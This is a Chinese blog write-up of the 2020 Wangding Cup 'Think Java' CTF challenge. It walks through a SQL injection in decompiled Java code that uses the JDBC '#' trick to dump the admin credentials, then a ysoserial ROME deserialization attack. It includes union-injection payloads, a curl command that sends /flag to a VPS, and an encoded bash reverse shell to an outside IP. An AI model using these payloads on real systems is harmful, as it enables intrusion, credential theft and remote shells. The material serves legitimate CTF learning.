[网鼎杯 2020 朱雀组]Think Java

最新推荐文章于 2024-05-23 09:45:45 发布
最新推荐文章于 2024-05-23 09:45:45 发布
阅读量2.4k 收藏 10
点赞数 5
分类专栏: javaweb CTF刷题记录 文章标签: CTF Web java 反序列化 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/124003575
版权
本文介绍了如何通过分析Java源码,发现SQL注入漏洞,并利用#字符特性绕过限制,获取数据库信息。接着,展示了如何进行Java反序列化攻击,利用ysoserial工具构造payload,最终获取Flag。同时提到了如何反弹shell的方法。
摘要由CSDN通过智能技术生成

[网鼎杯 2020 朱雀组]Think Java

文章目录

获取源文件

下载jar包,扔进jd-gui查看源码
在这里插入图片描述

主要是4个文件
Test.java
接收dbName参数,然后调用getTableData方法

package ;

import cn.abc.common.bean.ResponseCode;
import cn.abc.common.bean.ResponseResult;
import cn.abc.common.security.annotation.Access;
import cn.abc.core.sqldict.SqlDict;
import cn.abc.core.sqldict.Table;
import io.swagger.annotations.ApiOperation;
import java.io.IOException;
import java.util.List;
import org.springframework.web.bind.annotation.CrossOrigin;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

@CrossOrigin
@RestController
@RequestMapping({"/common/test"})
public class Test {
  @PostMapping({"/sqlDict"})
  @Access
  @ApiOperation(")
  public ResponseResult sqlDict(String dbName) throws IOException {
    List<Table> tables = SqlDict.getTableData(dbName, "root", "abc@12345");
    return ResponseResult.e(ResponseCode.OK, tables);
  }
}

Row.java
定义了一个Row类

package .sqldict;

public class Row {
  String name;
  
  String type;
  
  String def;
  
  String isNull;
  
  String isAuto;
  
  String remark;
  
  String isPK;
  
  String size;
  
  public String getIsPK() {
    return this.isPK;
  }
  
  public void setIsPK(String isPK) {
    this.isPK = isPK;
  }
  
  public String getName() {
    return this.name;
  }
  
  public void setName(String name) {
    this.name = name;
  }
  
  public String getType() {
    return this.type;
  }
  
  public void setType(String type) {
    this.type = type;
  }
  
  public String getDef() {
    return this.def;
  }
  
  public void setDef(String def) {
    this.def = def;
  }
  
  public String getIsNull() {
    return this.isNull;
  }
  
  public void setIsNull(String isNull) {
    this.isNull = isNull;
  }
  
  public String getIsAuto() {
    return this.isAuto;
  }
  
  public void setIsAuto(String isAuto) {
    this.isAuto = isAuto;
  }
  
  public String getRemark() {
    return this.remark;
  }
  
  public void setRemark(String remark) {
    this.remark = remark;
  }
  
  public String getSize() {
    return this.size;
  }
  
  public void setSize(String size) {
    this.size = size;
  }
  
  public Row() {}
  
  public Row(String name, String type, String def, String isNull, String isAuto, String remark, String isPK, String size) {
    this.name = name;
    this.type = type;
    this.def = def;
    this.isNull = isNull;
    this.isAuto = isAuto;
    this.remark = remark;
    this.isPK = isPK;
    this.size = size;
  }
}

SqlDict.java

连接数据库,其中sql语句处存在sql注入漏洞

package .sqldict;

import cn.abc.core.sqldict.Row;
import cn.abc.core.sqldict.Table;
import java.sql.Connection;
import java.sql.DatabaseMetaData;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

public class SqlDict {
  public static Connection getConnection(String dbName, String user, String pass) {
    Connection conn = null;
    try {
      Class.forName("com.mysql.jdbc.Driver");
      if (dbName != null && !dbName.equals("")) {
        dbName = "jdbc:mysql://mysqldbserver:3306/" + dbName;
      } else {
        dbName = "jdbc:mysql://mysqldbserver:3306/myapp";
      } 
      if (user == null || dbName.equals(""))
        user = "root"; 
      if (pass == null || dbName.equals(""))
        pass = "abc@12345"; 
      conn = DriverManager.getConnection(dbName, user, pass);
    } catch (ClassNotFoundException var5) {
      var5.printStackTrace();
    } catch (SQLException var6) {
      var6.printStackTrace();
    } 
    return conn;
  }
  
  public static List<Table> getTableData(String dbName, String user, String pass) {
    List<Table> Tables = new ArrayList<>();
    Connection conn = getConnection(dbName, user, pass);
    String TableName = "";
    try {
      Statement stmt = conn.createStatement();
      DatabaseMetaData metaData = conn.getMetaData();
      ResultSet tableNames = metaData.getTables((String)null, (String)null, (String)null, new String[] { "TABLE" });
      while (tableNames.next()) {
        TableName = tableNames.getString(3);
        Table table = new Table();
        String sql = "Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '" + dbName + "' and table_name='" + TableName + "';";
        ResultSet rs = stmt.executeQuery(sql);
        while (rs.next())
          table.setTableDescribe(rs.getString("TABLE_COMMENT")); 
        table.setTableName(TableName);
        ResultSet data = metaData.getColumns(conn.getCatalog(), (String)null, TableName, "");
        ResultSet rs2 = metaData.getPrimaryKeys(conn.getCatalog(), (String)null, TableName);
        String PK;
        for (PK = ""; rs2.next(); PK = rs2.getString(4));
        while (data.next()) {
          Row row = new Row(data.getString("COLUMN_NAME"), data.getString("TYPE_NAME"), data.getString("COLUMN_DEF"), data.getString("NULLABLE").equals("1") ? "YES" : "NO", data.getString("IS_AUTOINCREMENT"), data.getString("REMARKS"), data.getString("COLUMN_NAME").equals(PK) ? "true" : null, data.getString("COLUMN_SIZE"));
          table.list.add(row);
        } 
        Tables.add(table);
      } 
    } catch (SQLException var16) {
      var16.printStackTrace();
    } 
    return Tables;
  }
}

Table.java

package .sqldict;

import cn.abc.core.sqldict.Row;
import java.util.ArrayList;
import java.util.List;

public class Table {
  String tableName;
  
  String tableDescribe;
  
  List<Row> list = new ArrayList<>();
  
  public String getTableDescribe() {
    return this.tableDescribe;
  }
  
  public void setTableDescribe(String tableDescribe) {
    this.tableDescribe = tableDescribe;
  }
  
  public String getTableName() {
    return this.tableName;
  }
  
  public void setTableName(String tableName) {
    this.tableName = tableName;
  }
  
  public List<Row> getList() {
    return this.list;
  }
  
  public void setList(List<Row> list) {
    this.list = list;
  }
}

Swagger

注意看Test.java,导入了swagger这个东西

在这里插入图片描述

查一下资料

swagger-ui 提供了一个可视化的UI页面展示描述文件。接口的调用方、测试、项目经理等都可以在该页面中对相关接口进行查阅和做一些简单的接口请求。该项目支持在线导入描述文件和本地部署UI项目。

查资料会查到swagger-ui.html
在这里插入图片描述

访问swagger-ui.html,会看到有三个路由,分别对应不同的功能,注意看第三个功能,对应着jar包中Test.class,我们可以通过传dbName来进行sql注入

在这里插入图片描述

至于login和current,题目给我们jar包时候说了只给了部分class文件,不过login应该是登录用的

JDBC sql注入

关于#的使用

参考guoke师傅的解释

在这里插入图片描述

在url中#表示锚点,表示网页中的一个位置,比如http:xxx/index.html#aaa,浏览器读取这个url,会将aaa移到可视位置。在第一个#,都会被视为位置标识符,不会被发送到服务端

而jdbc类似于url解析,所以会忽略#后面的字符

#又是sql注入中的注释符,如果我们需要在url中传#,那么需要进行url编码为%23

查看数据库名字

select schema_name from information_schema.schemata;
效果相当于show databases;

在这里插入图片描述

获取所有数据库的名字
dbName=myapp#' union select group_concat(SCHEMA_NAME)from(information_schema.schemata)#
结果
information_schema,myapp,mysql,performance_schema,sys

在这里插入图片描述

获取表名

dbName=myapp#' union select group_concat(table_name)from(information_schema.tables)where(table_schema='myapp')#
结果
user

在这里插入图片描述

获取字段名

dbName=myapp#' union select group_concat(column_name)from(information_schema.columns)where((table_schema='myapp')and(table_name='user'))#
结果
id,name,pwd

在这里插入图片描述

获取字段值

dbName=myapp#' union select group_concat(id)from(user)#
结果 1
dbName=myapp#' union select group_concat(name)from(user)#
结果 admin
dbName=myapp#' union select group_concat(pwd)from(user)#
结果 admin@Rrrr_ctf_asde

所以就得到一个用户信息
序号为1,name为admin,密码为admin@Rrrr_ctf_asde

在这里插入图片描述

然后将用户名和密码在/common/user/login处提交,获取一串字符串

{
  "password": "admin@Rrrr_ctf_asde",
  "username": "admin"
}

在这里插入图片描述

将这段字符串放到/common/user/current处提交,然后就会发现回显了这个用户的信息

在这里插入图片描述

对序列化字符串分析

Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu

引用Mustapha Mond师傅的解释

下方的特征可以作为序列化的标志参考:
一段数据以rO0AB开头,你基本可以确定这串就是Java序列化base64加密的数据。
或者如果以aced开头,那么他就是这一段Java序列化的16进制。

java Deserialization Scanner插件使用

使用burpsuite的java Deserialization Scanner插件对其进行分析,在extender中安装这个插件

在这里插入图片描述

然后配置一下环境变量
在这里插入图片描述

然后抓包,将其发送到插件中
在这里插入图片描述

然后选择base64开始扫描,结果回显ROME有可能

在这里插入图片描述
接下来使用ysoserial打

ysoserial

curl将flag带出来

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl http://vps:7015 -d @/flag" > a.bin

a.py,python3环境运行

# -*- coding: UTF-8 -*-
import base64
file = open("a.bin","rb")

now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()

注意回显的字符串特征,看下大佬的技巧
在这里插入图片描述
注意最后提交的时候,要在前面加上Bearer

在这里插入图片描述

注意提前监听端口
然后在/common/user/current这里提交

在这里插入图片描述

监听处得flag

在这里插入图片描述

反弹shell

或者弹shell,弹shell操作参考链接

bash -i >& /dev/tcp/111.111.111.111/7015 0>&1
进行base64编码,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvNzAxNSAwPiYx

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvNzAxNSAwPiYx}|{base64,-d}|{bash,-i}" > a.bin
python a.py
将生成的java序列化后的值传进/common/user/current

监听端口,得shell
在这里插入图片描述

参考文章

  1. swagger参考文章
  2. h3zh1师傅的文章
  3. ysoserial使用方法
  4. guoke师傅的wp
  5. 关于information.schema的解释
  6. 弹shell操作参考链接
CTFHUB-think_java(2020-网鼎杯-朱雀-Web-think_java)
qq_51953382的博客
07-20 499
将编码后的内容填充到命令上,再通过ysoserial获得bin文件,拿到文件之后,我们还需要对其进行base64加密,这里使用的一个Python脚本。但是这是网鼎杯原题的payload,那个题目中flag名称就是flag,是不变的所以可以这么用,通过-d @来提取flag文件内容然后发到自己服务器。获得payload之后,先在咱们的服务器上监听端口之后,在另一个接口处输入payload,来进行反弹shell,注意开头的Bearer保留。进入之后,将我们的得到的信息输入登录实例,来进行调用。
[网鼎杯 2020 朱雀]Nmap1
最新发布
alwtj的博客
10-10 1055
知识点:escapeshellarg和escapeshellcmd函数的绕过.nmap使用方法.进入页面是一个NMAP工具的使用页面知识点:Nmap(Network Mapper)是一款功能强大的网络扫描工具,它能够帮助用户发现网络上的设备、开放的端口以及运行的服务。-sU-T0-T5这里试一下多条命令执行.;被转义了.那么看下页面源代码看看.他这里有提示:那么我们可以通过以下知识点写入webshell,或将flag读入指定文件在读取指定文件内容即可:从文件中读取IP地址列表进行扫描。
CTFjava反序列-2020-网鼎杯-朱雀-Web-think_java
(∪.∪ )...zzz的博客
06-13 3678
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
网鼎杯 2020 朱雀】Think Java
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-08 4871
网鼎杯 2020 朱雀】Think Java 首先下载题目附件,是一些.class文件,反编译查看。 注意到引入的其中一个包: import io.swagger.annotations.ApiOperation; Swagger Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。文件的方法,参数和模型紧密集成到服务器端的代码,允许API来始终保持同步。 Swagger UI 提供了
网鼎杯2020朱雀-web(Think Java)
weixin_43610673的博客
05-19 2593
下载class.zip解压后用jd-gui查看源码,我是用jd-gui弄出来然后sublime看的 在/common/test/sqlDict有个注入 主要是SqlDict.class 下面注入即可dbName=myapp?useUnicode=true’union/**/select/**/1 这里用post或者get提交都行 dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(informati
Ctfhub-think_java-2020网鼎杯-朱雀
weixin_54227009的博客
12-27 697
唉,做ctfhub这道题的时候,发现网上几乎都是跟风用的这个命令来直接读取根目录下的flag,我看了buuctf上的这道题因为flag就在跟目录下,flag的名称并没有变化,故可以直接读到flag。但ctfhub上这道题,题目已经提示了flag在根目录下,且flag名字是随机的,故用该方法并不能直接读取到flag,所以只有反弹shell的命令来cat flag。
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
网鼎2020-朱雀.rar
05-24
【网鼎2020-朱雀】是2020网鼎杯网络安全竞赛中朱雀的相关挑战资料,这个压缩包可能包含了该竞赛的Web类题目。网鼎杯是中国知名的网络安全技术大赛,旨在提升参赛者的网络安全技能,促进网络安全行业的健康发展...
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
《thinkjava
04-08
《Think Java》作者:Allen B. Downey and Chris Mayeld。 Java学习资料,适合入门。是英文版的。
Think Java.zip
07-23
java编程思想pdf版本 这也是我自己一直看的一个版本很清晰 可以电脑 手机看 也可以在Kindle 看
phpweb-[网鼎杯 2020 朱雀]-[BUUCTF]
qwsn
11-23 2047
0x01、Web 1.phpweb-[网鼎杯 2020 朱雀]-[传送门->BUUCTF] 第一步:点击传送门,打开题目环境 观察题目页面: //打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。 //利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数
[网鼎杯 2020 朱雀]Nmap 1
plant1234的博客
04-15 2504
[网鼎杯 2020 朱雀]Nmap 1 首先得到题目打开得到 说是输入houst和IP进行扫描 测试一波:127.0.0.1 得到: 本地测一下nmap 命令得到: 发现效果一样 这里需要知道 nmap 命令将扫描结果保存在文件里面: 例如:将nmap 127.0.0.1的结果保存在test.txt里面 nmap 127.0.0.1 -oN test.txt nmap其他写文件命令: -oN (标准输出) -oX (XML输出) -oS (ScRipT KIdd|3 oUTpuT) -oG (G
朱雀JAVA游戏_[网鼎杯2020朱雀]Think JAVA
weixin_36087895的博客
02-27 287
前言现在算是取得了很大的希望。但此题必有玄机。这就是朱雀31解的题,tqllllllllllll。下面是现在的功效,然则我照样没能拿到flag……菜,枯了。进入正题下方截图算是hint , 固然对于没有用过swagger-ui的 ,照样不算hint的叭(我都是问的大佬)。他是一个测试接口,我原本分享了swagger-ui的链接来着,然则现在谁人链接好像被接见炸了。(我在文章中已经把链接删了……考...
CTF网鼎杯2020朱雀 thinkjava思路记录
c0529的博客
05-23 1356
1.代码分析 BUUCTF在线评测 (buuoj.cn)打开ctf赛题之后,下载class文件,这个部分是不完整点的源码 在sqldict中存在一个sql注入点,没有采用java的预编译,调用了这个的是在test中,同时,这个采用了swagger接口,这是一个测试页面的接口,我们直接尝试打开这个页面 打开 网址/swagger-ui.html 2.测试点1 这里可以看见有三个可以测试的位置,参考源码中的文件地址,可以发现sql注入点存在在test这个测试中,我们dbName注入sql注
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络拓扑等。nmap具有强大的扫描功能和灵活的配置选项,是网络安全工作者必备的工具之一。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值